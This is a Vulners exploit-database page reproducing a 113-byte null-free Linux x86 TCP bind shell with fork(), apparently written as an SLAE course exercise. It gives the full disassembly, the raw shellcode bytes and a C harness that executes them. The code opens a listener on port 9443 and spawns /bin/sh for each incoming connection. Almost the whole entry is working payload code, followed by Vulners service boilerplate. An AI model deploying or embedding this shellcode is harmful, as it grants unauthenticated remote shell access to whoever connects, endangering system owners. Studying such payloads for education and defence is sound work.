Vulners
Lucene search
Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)
/*
Title: Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
Author: Amine Kanane <[email protected]>
Student-ID: SLAE - 1203
Desc: Listen for a connection on Local Port 9443 and spawn a command shell
This version support multiple simultaneous connections using fork().
Also this shellcode does not use the classic socketcall() syscall.
Tested on: Linux/x86 - SMP Debian 4.9.30-1kali1
Date: 7 May 2018
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: 66 b8 67 01 mov ax,0x167
804806c: b3 02 mov bl,0x2
804806e: b1 01 mov cl,0x1
8048070: cd 80 int 0x80
8048072: 89 c3 mov ebx,eax
8048074: 66 b8 69 01 mov ax,0x169
8048078: 52 push edx
8048079: 66 68 24 e3 pushw 0xe324 ; <== This is where we set the port number, please note that you need to adapt the number using htons() before :)
804807d: 66 6a 02 pushw 0x2
8048080: 89 e1 mov ecx,esp
8048082: b2 10 mov dl,0x10
8048084: cd 80 int 0x80
8048086: 66 b8 6b 01 mov ax,0x16b
804808a: 31 c9 xor ecx,ecx
804808c: cd 80 int 0x80
0804808e <infinite>:
804808e: 31 d2 xor edx,edx
8048090: 31 f6 xor esi,esi
8048092: 66 b8 6c 01 mov ax,0x16c
8048096: cd 80 int 0x80
8048098: 89 c6 mov esi,eax
804809a: 31 c0 xor eax,eax
804809c: b0 02 mov al,0x2
804809e: cd 80 int 0x80
80480a0: 31 ff xor edi,edi
80480a2: 39 f8 cmp eax,edi
80480a4: 75 e8 jne 804808e <infinite>
80480a6: 31 c0 xor eax,eax
80480a8: b0 06 mov al,0x6
80480aa: cd 80 int 0x80
80480ac: 89 f3 mov ebx,esi
80480ae: b1 02 mov cl,0x2
080480b0 <loop_dup>:
80480b0: b0 3f mov al,0x3f
80480b2: cd 80 int 0x80
80480b4: fe c9 dec cl
80480b6: 79 f8 jns 80480b0 <loop_dup>
80480b8: 31 c0 xor eax,eax
80480ba: 50 push eax
80480bb: 89 e2 mov edx,esp
80480bd: 68 2f 2f 73 68 push 0x68732f2f
80480c2: 68 2f 62 69 6e push 0x6e69622f
80480c7: 89 e3 mov ebx,esp
80480c9: 50 push eax
80480ca: 53 push ebx
80480cb: 89 e1 mov ecx,esp
80480cd: b0 0b mov al,0xb
80480cf: cd 80 int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
"\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
"\x66\xb8\x69\x01\x52\x66\x68"
"\x24\xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
"\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
"\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
"\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
"\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
"\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
"\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
"\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
"\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 May 2018 00:00Current
0.1Low risk
Vulners AI Score0.1